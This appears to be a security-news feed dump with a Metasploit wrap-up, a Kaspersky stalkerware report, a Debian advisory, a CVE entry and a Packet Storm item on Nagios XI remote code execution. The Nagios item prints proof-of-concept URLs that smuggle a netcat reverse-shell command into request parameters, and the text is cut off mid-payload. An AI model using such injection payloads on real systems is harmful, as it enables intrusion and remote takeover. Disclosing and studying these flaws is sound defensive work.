module you can now enumerate users by setting a few options.\n\n# Have you heard of herpaderping?\n\nFor those that have, Metasploit now has a new toy for you. [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) built on some great research by [Johnny Shaw](<https://github.com/jxy-s>), to bring this technique to Metasploit. Using the new `evasion/windows/process_herpaderping` module, you too can generate Windows PE files that hide the code behind the curtain, if you will, when executed on a target.\n\n## Join the community.\n\nFor anyone interested in working with Metasploit in this year's [Google Summer of Code](<https://summerofcode.withgoogle.com/>), you'll have to wait until March 9th to find out if we've been accepted as mentors. However, you can get a head start by checking out our current project [shortlist](<https://github.com/rapid7/metasploit-framework/wiki/GSoC-2021-Project-Ideas>). Said shortlist is still being worked on, and applicants can suggest their own project ideas, so get looking and see what jumps out at you!\n\n## New Modules (4)\n\n * [Apache Flink JobManager Traversal](<https://github.com/rapid7/metasploit-framework/pull/14766>) by 0rich1 - Ant Security FG Lab, [Hoa Nguyen - Suncsr Team](<https://vn.linkedin.com/in/hoanx4>), and [bcoles](<https://github.com/bcoles>), which exploits[CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>), adds an auxiliary module that leverages the directory traversal vulnerability within Apache Flink to recover files from the affected server. This vulnerability does not require authentication.\n * [Apache Flink JAR Upload Java Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14771>) by [Henry Chen](<https://github.com/chybeta>), [bcoles](<https://github.com/bcoles>), and [bigger.wing](<https://github.com/biggerwing>), adds an exploit module that leverages Apache Flink to upload and run an arbitrary JAR file.\n * [Microsoft RDP Web Client Login Enumeration](<https://github.com/rapid7/metasploit-framework/pull/14544>) by [Matthew Dunn](<https://github.com/k0pak4>), adds a scanner module that leverages the timing behavior of the web rdp authentication process to determine valid users.\n * [Process Herpaderping evasion technique](<https://github.com/rapid7/metasploit-framework/pull/14648>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Johnny Shaw](<https://github.com/jxy-s>), adds an evasion module that takes advantage of the Process Herpaderping evasion technique.\n\n## Enhancements and features\n\n * [#14784](<https://github.com/rapid7/metasploit-framework/pull/14784>) from [bcoles](<https://github.com/bcoles>) This fixes a bug in the ScadaBR credential dumping module that prevented it from processing response data.\n\n * [#14617](<https://github.com/rapid7/metasploit-framework/pull/14617>) from [zeroSteiner](<https://github.com/zeroSteiner>) The core Meterpreter and console libraries have been updated to better handle cases where a given implementation of Meterpreter may not support a certain command. Now instead of each version of Meterpreter trying to handle invalid commands, which previously lead to errors, they will instead check if they support that command and then will throw an error message if they do not support that command. Additionally, the output from running the `help` or `?` command inside the `meterpreter` prompt has been updated so as to not display a command that a given Meterpreter implementation does not support. Tests have also been updated accordingly to support checking this functionality works as expected.\n\n * [#14670](<https://github.com/rapid7/metasploit-framework/pull/14670>) from [adfoster-r7](<https://github.com/adfoster-r7>) Word wrapping of Rex tables is now enabled by default for all Rex tables except for those output by the `creds` and `search` commands. This feature can optionally be turned off by issuing the `features set wrapped_tables false` command.\n\n * [#14735](<https://github.com/rapid7/metasploit-framework/pull/14735>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates have been made to require all new modules to now pass RuboCop and msftidy.rb checks prior to being merged into the framework. These checks will now be run automatically on PRs to detect issues rather than users having to run these tools manually to detect code quality issues within their contributions.\n\n * [#14740](<https://github.com/rapid7/metasploit-framework/pull/14740>) from [zeroSteiner](<https://github.com/zeroSteiner>) This makes a few improvements to the [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>) and adds a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library).\n\n## Bugs Fixed\n\n * [#14748](<https://github.com/rapid7/metasploit-framework/pull/14748>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) A bug has been fixed in the `Auxiliary::AuthBrute` that caused a crash when the `DB_ALL_USERS` or `DB_ALL_PASS` options were set. This has now been addressed.\n * [#14789](<https://github.com/rapid7/metasploit-framework/pull/14789>) from [zeroSteiner](<https://github.com/zeroSteiner>) A bug has been fixed whereby Meterpreter sessions were incorrectly being validated due to the fact that TLV encryption for the session would take place before session verification. The fix now considers Meterpreter sessions valid if they successfully negotiate TLV encryption. This fix also removes the `AutoVerifySession` datastore option since all valid Meterpreter instances should negotiate TLV encryption automatically.\n * [#14802](<https://github.com/rapid7/metasploit-framework/pull/14802>) from [dwelch-r7](<https://github.com/dwelch-r7>) A bug within the Kiwi library has been fixed whereby commands passed to Kiwi via the `kiwi_cmd` command in Metasploit where not being properly enclosed in double quotes, which could lead to Kiwi thinking the user had passed it two separate commands to execute rather than one space separated command.\n * [#14812](<https://github.com/rapid7/metasploit-framework/pull/14812>) from [dwelch-r7](<https://github.com/dwelch-r7>) Restores missing requires for sock5 proxy support.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-18T05%3A04%3A04-06%3A00..2021-02-25T11%3A27%3A42-06%3A00%22>)\n * [Full diff 6.0.31...6.0.32](<https://github.com/rapid7/metasploit-framework/compare/6.0.31...6.0.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-26T19:23:43", "published": "2021-02-26T19:23:43", "id": "RAPID7BLOG:46A54401F6ED43B72F664A32EA043CB8", "href": "https://blog.rapid7.com/2021/02/26/metasploit-wrap-up-100/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-02-26T15:52:50", "bulletinFamily": "blog", "cvelist": [], "description": "\n\n [The state of stalkerware in 2020 (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/100/2020/03/25175212/EN_The-State-of-Stalkerware-2020.pdf>)\n\n## Main findings\n\nKaspersky's data shows that the scale of the stalkerware issue has not improved much in 2020 compared to the last year:\n\n * The number of people affected is still high. In total, 53,870 of our mobile users were affected globally by stalkerware in 2020. Keeping in mind the big picture, these numbers only include Kaspersky users, and the total global numbers will be higher. Some affected users may use another cybersecurity solution on their devices, while some do not use any solution at all.\n * With more than 8,100 users affected globally, Nidb is the most used stalkerware sample, according to our 2020 stats. This sample is used to sell a number of different stalkerware products such as iSpyoo, TheTruthSpy and Copy9 among others.\n * In terms of geographic spread, we see a largely consistent trend emerging: Russia, Brazil, and the United States of America (USA) remain the most affected countries globally, and they are the three leading countries in 2020.\n * In Europe, Germany, Italy and the United Kingdom (UK) are the top three most-affected countries respectively.\n\n## Introduction and methodology\n\nTechnology has enabled people to connect more than ever before. We can choose to digitally share our lives with our partner, family, and friends regardless of how far we are physically. Yet, we are also seeing a rise in software that enables users to remotely spy on another person's life via their digital device, without the affected user giving their consent or being notified.\n\nThe software, known as stalkerware, is commercially available to everyone with access to the internet. The risks of stalkerware can go beyond the online sphere and enter the physical world. The Coalition Against Stalkerware [warns](<https://stopstalkerware.org/what-is-stalkerware/>) that stalkerware "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence." Stalkerware can also operate in stealth mode, meaning that there is no icon displayed on the device to indicate its presence and it is not visible to the affected user. The majority of affected users do not even know this type of software exists. This means they cannot protect themselves, online or offline, especially as the perpetrator using stalkerware usually knows their victim personally.\n\nIn recent years, Kaspersky has been actively working with partners to end the use of stalkerware. In 2019, we created a special alert that notifies users if stalkerware is installed on their phones. Following that we became one of ten founding members of the Coalition Against Stalkerware. We also published our first full [report](<https://press.kaspersky.com/stories/stalkerware/>) on the state of stalkerware in the same year to understand the scale of the problem.\n\nThis report continues to examine the issue of stalkerware and presents new statistics from 2020, in comparison to our previous data. The data in this report has been taken from aggregated threat statistics obtained from the Kaspersky Security Network. The Kaspersky Security Network is dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world. _All received data is anonymized. To calculate our statistics, we review the consumer line of Kaspersky's mobile security solutions._\n\n## The issue of, and the story behind, stalkerware\n\nStalkerware is software that is commercially available to everyone with access to the internet. It is used to spy remotely on another person via their device, without the affected user giving their consent or being notified. Stalkerware operates in stealth mode, meaning that there is no icon displayed on the device indicating its presence, and it is not visible to the affected user. Therefore, the Coalition Against Stalkerware [defines](<https://stopstalkerware.org/what-is-stalkerware/>) stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\n### The dimension of cyberviolence\n\nAccording to a [report](<https://eige.europa.eu/news/cyber-violence-growing-threat-especially-women-and-girls>) by the European Institute for Gender Equality, "seven in ten women in Europe who have experienced cyberstalking have also experience at least one form of physical and/or sexual violence from an intimate partner". Echoing these findings, experts from non-profit organizations (NPOs) that help domestic abuse survivors and victims emphasize that cyberstalking is also a form of violence. Just as with physical, psychological, and economic violence, an abuser can use surveillance to obtain complete control of their victim/survivor[1] and stay in charge of the situation.\n\nUsing stalkerware, the extent of control held by the abuser can be immense. Depending on the type installed, stalkerware may have a variety of functions to intrude into the victim's privacy. With the software's help, an abuser can:\n\n * Read anything the surveilled person types \u2013 logging each keystroke on the device, including credentials to any kind of services such as banking applications, online shops and social networks, etc.\n * Know where they are \u2013 by tracking a person's movements with GPS, in real time\n * Hear what they say \u2013 eavesdrop on calls, or even record them\n * Read messages on any messenger, regardless of whether encryption is used\n * Monitor social network activity\n * See photos and videos\n * Switch on the camera\n\nAll of this private information can be collected, usually from a mobile device, such as a tablet or a smartphone.\n\nNon-profit organizations from the Coalition Against Stalkerware are experiencing a growing number of survivors seeking help with the problem:\n\n * Findings from the Second National Survey on technology abuse and domestic violence in **Australia,** launched by WESNET with the assistance of Dr. Delanie Woodlock and researchers from Curtin University, state that 99.3% of domestic violence practitioners have clients experiencing technology-facilitated abuse and that the use of video cameras increased by 183.2% between 2015 and 2020.\n * According to a study on cyberviolence in intimate relationships, conducted by the Centre Hubertine Auclert in **France**, 21% of victims have experienced stalkerware at the hands of their abusive partner, and 69% of victims have the feeling that the personal information on their smartphone has been accessed by their partner in a hidden way.\n * In **Germany**, for several years, Women's Counselling Centers and Rape Crisis Centers (bff) have noticed an increasing use of stalkerware in conjunction with partner relationships.\n * In the **USA**, stalking impacts an estimated 6-7.5 million people over a one-year period, and one-in-four victims report being stalked through some form of technology, according to the Stalking Prevention Awareness & Resource Center (SPARC).\n\n### Physical access is the key\n\nUnfortunately, it is not too difficult to secretly install stalkerware on a victim's phone. The main barrier that exists is that stalkerware has to be configured on an affected device. Due to the distribution vector of such applications which are very different from common malware distribution schemes, it is impossible to get infected with a stalkerware through a spam message including a link to stalkerware or a trap via normal web surfing.\n\nThis means that the abuser will need to have physical access to the target device in order to install stalkerware. This is possible if the device either has no pin, pattern, or password to protect it or alternatively, the abuser knows the victim/survivor personally. Installation on the target device can be completed within a few minutes.\n\nPrior to accessing the survivor's device, the abuser has to collect a link to the installation package from the stalkerware developer's webpage. In most cases, the software is not downloaded from an official application store. For Android devices, Google [banned](<https://support.google.com/googleplay/android-developer/answer/10065487?hl=en>) applications that are clearly stalkerware from its Google Play application store in 2020. This means the abuser will not be able to install such an application from the general app store. Instead, the abuser must follow several steps before being able to install stalkerware. As a result, the abuser may leave traces in the device settings that a user can check if they are concerned they may be being spied on.\n\nStalkerware tools are less frequent on iPhones than on Android devices because iOS is traditionally a closed system. However, perpetrators can work around this limitation on jailbroken iPhones. They still need physical access to the phone to jailbreak it, so iPhone users who fear surveillance should always keep an eye on their device. Alternatively, an abuser can offer their victim an iPhone \u2013 or any other device \u2013 with pre-installed stalkerware as a gift. There are many companies who make their services available online to install such tools on a new phone and deliver it to an unwitting addressee in factory packaging to celebrate a special occasion.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142049/stalkerware_report_2020_01.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142131/stalkerware_report_2020_02.png>)\n\n### The risk of privacy leaks\n\nThe information monitored via stalkerware will be available to at least one person \u2013 the abuser who installed stalkerware on the survivor's phone. However, sometimes it is possible that all the private data may become publically available. Year on year, stalkerware servers are either hacked or left openly unprotected so that information can be accessed and leaked online. For example, in 2020, such a data breach occurred due to a product provided by [ClevGuard](<https://techcrunch.com/2020/02/20/kidsguard-spyware-app-phones/>). In previous years, we have seen similar incidents with [Mobiispy](<https://www.vice.com/en/article/7xnybe/hosting-provider-takes-down-spyware-mobiispy>) in 2019 and with [MSpy](<https://searchsecurity.techtarget.com/news/252448327/Another-mSpy-leak-exposed-millions-of-sensitive-user-records>) in 2018 and 2015.\n\nThese are just a few examples of a long list in which databases from companies developing stalkerware have been exposed, affecting millions of user accounts. With the possibility to track a person's location, it means that not only their cyberprivacy is lost but also their security in the physical world may be at risk.\n\n### The legal status\n\nStalkerware applications are sold and provided by companies under various facades, such as child monitoring or employee tracking solutions. While laws vary from one country and state to another, they are catching up. Generally speaking, it is only illegal to use such tools and apps that record user activity without their consent or that of legal authority. Slowly we are seeing some shifts in legislation. For instance, in 2020, France reinforced sanctions on secret surveillance: geolocating someone without their consent is now punishable with one year imprisonment and a fine of 45,000 euros. If this is done within a couple, the sanctions are potentially higher, including two years' imprisonment and a fine of 60,000 euros.\n\nStalkerware tools often violate laws and expose the stalker to legal liability for any recordings made without the victim's knowledge. Stalkers must realize that they are breaking the law. If the use of stalkerware is reported, the punishment applies to the private perpetrator who installed the software \u2013 not its vendor. In the USA, only two stalking app developers have been fined in recent history. One had to pay a record 500,000 US dollar fine, which put an end to the app development process, while the other got off with an order to change the app's functionality for future sales.\n\n## The scale of the issue\n\n### Global detection figures \u2013 affected users\n\nIn this section, we look at the global numbers of unique users whose mobile device was found to have stalkerware detected.\n\nThe 2020 data shows that the stalkerware situation has not improved much: the number of affected people is still high. A total of 53,870 unique users were affected globally by stalkerware in 2020. Whereas in 2019, 67,500 unique users were affected globally. However, the fact must be taken into account that 2020 was an unprecedented year in which lives have changed in a dramatic way across the globe.\n\nTo fight the COVID-19 pandemic, all countries in the world have faced massive restrictions such as self-isolation measures or lockdowns in order to make people stay at home. Considering that stalkerware is used as another tool to control an intimate partner who the abuser lives with as they go about their day-to-day life, this can explain the somewhat lower numbers in comparison with the previous year.\n\n_Unique users affected by stalkerware globally from 2018 until 2020 \u2013 total per year ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>))_\n\nWhen looking at the figures of the total number of unique users affected by stalkerware in 2020 worldwide per month, this trend becomes even more noticeable. The first two months of the year were stable with many cases of affected devices arising, showing stalkerware was quite popular. The situation changed in March when many countries decided to announce quarantine measures. The curve shows a trend that the numbers began to stabilize as of June 2020 when many countries around the world eased restrictions.\n\n_Unique users affected by stalkerware in 2020 worldwide \u2013 total by month ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/19142943/02-en-stalkerware-report-1.png>))_\n\nThat said, the 2020 numbers are still on a high, stable level. In comparison, in 2018, there were 40,173 detections of unique users being affected globally by stalkerware. This brings into perspective the total numbers from 2020, as we have seen a growing integration of technology into our lives. Sadly, this also means the software used for stalking is becoming more common as another form of intimate partner violence.\n\n### Global detection figures \u2013 stalkerware samples\n\nIn this section, we analyze which stalkerware samples are actually the most used to control mobile devices on a global level. In 2020 the most detected samples can be seen in the following results.\n\n**Top 10 most detected stalkerware samples globally**\n\n** ** | **Samples** | **Affected users** \n---|---|--- \n**1** | Monitor.AndroidOS.Nidb.a | 8147 \n**2** | Monitor.AndroidOS.Cerberus.a | 5429 \n**3** | Monitor.AndroidOS.Agent.af | 2727 \n**4** | Monitor.AndroidOS.Anlost.a | 2234 \n**5** | Monitor.AndroidOS.MobileTracker.c | 2161 \n**6** | Monitor.AndroidOS.PhoneSpy.b | 1774 \n**7** | Monitor.AndroidOS.Agent.hb | 1463 \n**8** | Monitor.AndroidOS.Cerberus.b | 1310 \n**9** | Monitor.AndroidOS.Reptilic.a | 1302 \n**10** | Monitor.AndroidOS.SecretCam.a | 1124 \n \n 1. With more than 8,100 users having been affected by it, **Nidb** was the most used stalkerware sample in 2020. The Nidb creator sells their product as Stalkerware as a Service. This means that anyone could rent their control server software and mobile application, rename it to any suitable marketing name and sell it separately\u2014examples of this include iSpyoo, TheTruthSpy, Copy9, and others.\n 2. Both second and eighth place are occupied by Cerberus. These are two different samples under the same family. Variant **Cerberus.a** affected more than 5,400 users.\n 3. **Agent.af** comes in third place, with more than 2,700 users having been affected. This is marketed as Track My Phone and has typical features such as reading messages from any messenger, logging a person's call history, and tracking geolocation.\n 4. **Anlost.a** is a good example of stalkerware in disguise. It is advertised as an antitheft application, and its icon is present on the home screen (not usual behavior for stealthy stalkerware apps). Therefore, it is available on the Google Play Store. That said, it is possible to deliberately hide the icon from the home screen. One of the key functionalities of the application is to intercept SMS messages and read the call log. More than 2,200 users having been affected by this sample.\n 5. **MobileTracker.c** has several functionalities such as intercepting messages from popular social networks and taking remote control of the affected device. More than 2,100 users having been affected by this sample.\n 6. **PhoneSpy** is also known as Spy Phone app or Spapp Monitoring. This application consists of many spy features, covering all popular instant messengers and social networks.\n 7. **Agent.hb** is another version of MobileTracker. Like the original version, it offers many functionalities.\n 8. **Cerberus.b**, a different sample from the same family as Cerberus.a.\n 9. **Reptilic.a** is stalkerware that includes many features such as social media monitoring, call recordings, and browser history monitoring.\n 10. **SecretCam.a** is camera stalking software, meaning it is able to secretly record video from the front or back camera of the affected device.\n\n### Geography of affected users\n\nStalkerware is a global phenomenon that affects countries regardless of size, society, or culture. When looking at the top 10 affected countries worldwide in 2020, Kaspersky's findings show that largely the same countries remain the most affected, with Russia in the number one spot. Yet, we see an increase in stalkerware activity in Brazil and the USA in 2020 compared to 2019. However, we detected fewer incidents in India, which has fallen in the rankings. We have also detected a higher number of incidents in Mexico, which has risen in the ranking two places.\n\n**Top 10 most affected countries by stalkerware - globally**\n\n** ** | **Country** | **Affected users** \n---|---|--- \n**1** | Russian Federation | 12389 \n**2** | Brazil | 6523 \n**3** | United States of America | 4745 \n**4** | India | 4627 \n**5** | Mexico | 1570 \n**6** | Germany | 1547 \n**7** | Iran | 1345 \n**8** | Italy | 1144 \n**9** | United Kingdom | 1009 \n**10** | Saudi Arabia | 968 \n \nWhen considering Europe, Germany, Italy and the UK are the three most affected countries, in that order. They are followed by France in fourth place and Spain in fifth place.\n\n**Top 10 most affected countries by stalkerware - Europe**\n\n** ** | **Country** | **Affected users** \n---|---|--- \n**1** | Germany | 1547 \n**2** | Italy | 1144 \n**3** | United Kingdom | 1009 \n**4** | France | 904 \n**5** | Spain | 873 \n**6** | Poland | 444 \n**7** | Netherlands | 321 \n**8** | Romania | 222 \n**9** | Belgium | 180 \n**10** | Austria | 153 \n \n## How to check if a mobile device has stalkerware installed\n\nIt's hard for everyday users to know if stalkerware is installed on their devices. Generally, this type of software remains hidden which includes hiding the icon of the stalkerware app on the home screen and in the phone menu and even cleaning any traces that have been made. However, it may give itself away and there are some warning signs. Among the most important are:\n\n * Keep an eye out for a fast draining battery, constant overheating and mobile data traffic growth.\n * Do regular antivirus scanning on your Android device: If the cybersecurity solution detected stalkerware, **do not rush to remove it as the abuser may notice**. Have a safety plan in place and reach out to a local help organization.\n * Check browser history: To download stalkerware, the abuser will have to visit some web pages, the affected user does not know about. Alternatively, there could be no history at all if abuse wiped it out.\n * Check "unknown sources" settings: If "unknown sources" are enabled on your device, it might be a sign that unwanted software were installed from third-party source.\n * Check permissions of installed apps: Stalkerware application may be disguised under a wrong name with suspicious access to messages, call logs, location, and other personal activity.\n\nHowever, it's also important to understand that warning signs or symptoms are not necessarily proof that stalkerware is installed on a device.\n\n## How to minimize the risk\n\nThere are a few pieces of advice that can help to increase your digital safety:\n\n * Never lend your phone to anyone without seeing what happens with the phone and not leave it unlocked.*\n * Use a complex lock screen password and change passwords on a regular basis.\n * Do not disclose your password to anyone \u2013 not even your intimate partner or family members or close friends.*\n * [Do regular checks of your phone](<https://usa.kaspersky.com/blog/five-regular-checks-for-android/22892/?cid=usa_kdus_acq_ona_smm__onl_b2c_som_post_______&utm_source=kdaily&utm_medium=blog&utm_campaign=us_stalkerware_zt0106&utm_content=sm-post&utm_term=us_kdaily_organic_r106oc0m7jbkr5g>)\u2014 delete apps you don't use and review the permissions granted to each app.\n * Disable the option of third-party application installation on Android devices.\n * Protect your Android devices with a cyber-security solution, such as [Kaspersky Internet Security for Android](<https://usa.kaspersky.com/internet-security?cid=usa_socmedregular_acq_ona_smm__onl_b2c__lnk____kis___>) (for free), which detects stalkerware and issues warnings.\n\n_*In the context of domestic violence and abusive relationships it may be difficult or even impossible to deny the abusive partner access to the phone._\n\n## Kaspersky's activities and contribution to end cyberviolence\n\nKaspersky is actively working to end the use of cyberviolence and stalkerware, as a [company](<https://csr.kaspersky.com/en/antistalking/eng.html>), and together with many other partners. In 2019, we created a special alert that notifies users when stalkerware is installed on their phones. In the same year, with nine other founding members we created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). In 2020, we created TinyCheck, a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with victims of domestic violence. TinyCheck can be found on <https://github.com/KasperskyLab/TinyCheck>. Since 2021, we are one of five partners in an EU-wide project aimed at tackling gender-based cyberviolence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n## About the Coalition Against Stalkerware\n\nThe Coalition Against Stalkerware ("CAS" or "Coalition") is a group dedicated to addressing abuse, stalking, and harassment via the creation and use of stalkerware. Launched in November 2019, the Coalition Against Stalkerware gained 26 partners in its first year. These include founding partners \u2013 Avira, Electronic Frontier Foundation, the European Network for the Work with Perpetrators of Domestic Violence, G DATA Cyber Defense, Kaspersky, Malwarebytes, The National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape, and WEISSER RING. The Coalition looks to bring together a diverse array of organizations to actively address the criminal behavior perpetrated through stalkerware and increase public awareness about this important issue. Due to the high societal relevance for users all over the globe and new variants of stalkerware emerging periodically, the Coalition Against Stalkerware is open to new partners and calls for cooperation. To find out more about the Coalition Against Stalkerware please visit the official website [www.stopstalkerware.org](<http://www.stopstalkerware.org>)\n\n[1] Experts refer in their terminology more and more to the empowering term survivor instead of victim. Hence, in this report, we will use both terms.", "modified": "2021-02-26T08:00:11", "published": "2021-02-26T08:00:11", "id": "SECURELIST:790E93B8B357EC3A985B121FDCB1E991", "href": "https://securelist.com/the-state-of-stalkerware-in-2020/100875/", "type": "securelist", "title": "The state of stalkerware in 2020", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-02-26T13:31:30", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21239", "CVE-2017-1000433"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2577-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Abhijith PA\nFebruary 26, 2021 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : python-pysaml2\nVersion : 3.0.0-5+deb9u2\nCVE ID : CVE-2017-1000433 CVE-2021-21239\nDebian Bug : 886423 CVE-2021-21239\n\nSeveral issues have been found in python-pysaml2, a pure python \nimplementation of SAML Version 2 Standard.\n\nCVE-2017-1000433\n\n pysaml2 accept any password when run with python optimizations \n enabled. This allows attackers to log in as any user without \n knowing their password.\n\nCVE-2021-21239\n\n pysaml2 has an improper verification of cryptographic signature\n vulnerability. Users of pysaml2 that use the default\n CryptoBackendXmlSec1 backend and need to verify signed SAML\n documents are impacted. PySAML2 does not ensure that a signed\n SAML document is correctly signed. The default\n CryptoBackendXmlSec1 backend is using the xmlsec1 binary to\n verify the signature of signed SAML documents, but by default\n xmlsec1 accepts any type of key found within the given document.\n xmlsec1 needs to be configured explicitly to only use only _x509\n certificates_ for the verification process of the SAML document signature.\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.0.0-5+deb9u2.\n\nWe recommend that you upgrade your python-pysaml2 packages.\n\nFor the detailed security status of python-pysaml2 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/python-pysaml2\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-02-26T05:06:18", "published": "2021-02-26T05:06:18", "id": "DEBIAN:DLA-2577-1:3F007", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00038.html", "title": "[SECURITY] [DLA 2577-1] python-pysaml2 security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-26T14:32:00", "description": "Vapor is a web framework for Swift. In Vapor before version 4.40.1, there is a DoS attack against anyone who Bootstraps a metrics backend for their Vapor app. The following is the attack vector: 1. send unlimited requests against a vapor instance with different paths. this will create unlimited counters and timers, which will eventually drain the system. 2. downstream services might suffer from this attack as well by being spammed with error paths. This has been patched in 4.40.1. The `DefaultResponder` will rewrite any undefined route paths for to `vapor_route_undefined` to avoid unlimited counters.", "edition": 1, "cvss3": {}, "published": "2021-02-26T02:15:00", "title": "CVE-2021-21328", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2021-21328"], "modified": "2021-02-26T02:44:00", "cpe": [], "id": "CVE-2021-21328", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21328", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-02-26T16:40:53", "description": "", "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161561", "href": "https://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`# nagios-xi-5.7.5-bugs \nBugs reported to Nagios XI \n \n \n## CVE-2021-25296 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php` \n \n### Code snippet \n \n```php \nif (!empty($plugin_output_len)) { \n$disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n} \necho $disk_wmi_command; \n// Run the WMI plugin to get realtime info \nexec($disk_wmi_command, $disk_output, $disk_return_var); \nexec($service_wmi_command, $service_output, $service_return_var); \nexec($process_wmi_command, $process_output, $process_return_var); \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=` \n \nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25297 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php` \n \n### Code Snippet \n \n```php \nfunction switch_configwizard_add_cfg_to_mrtg($address) \n{ \n// get the data that we need \n$mrtg_confd_dir = \"/etc/mrtg/conf.d\"; \necho $address; \n$mrtg_cfg_file = \"{$address}.cfg\"; \n$absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\"; \n$cfgmaker_file = switch_configwizard_get_walk_file($address); \n// check if the file already exists for useful debugging \n$mrtg_confd_contents = scandir($mrtg_confd_dir); \necho \"REACHED HERE1\"; \nif (in_array($mrtg_cfg_file, $mrtg_confd_contents)) { \ndebug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\"); \n} else { \ndebug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\"); \n} \necho \"REACHED HERE2\"; \n// copy the cfgmaker file to the mrtg cfg destination \necho $cfgmaker_file; \necho $absolute_mrtg_cfg_file; \nif (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) { \ndebug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\"); \nreturn false; \n} \necho \"REACHED HERE3\"; \necho $absolute_mrtg_cfg_file; \n// add some meta info to the file \n$infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\"; \nexec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\"); \n \nreturn true; \n} \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 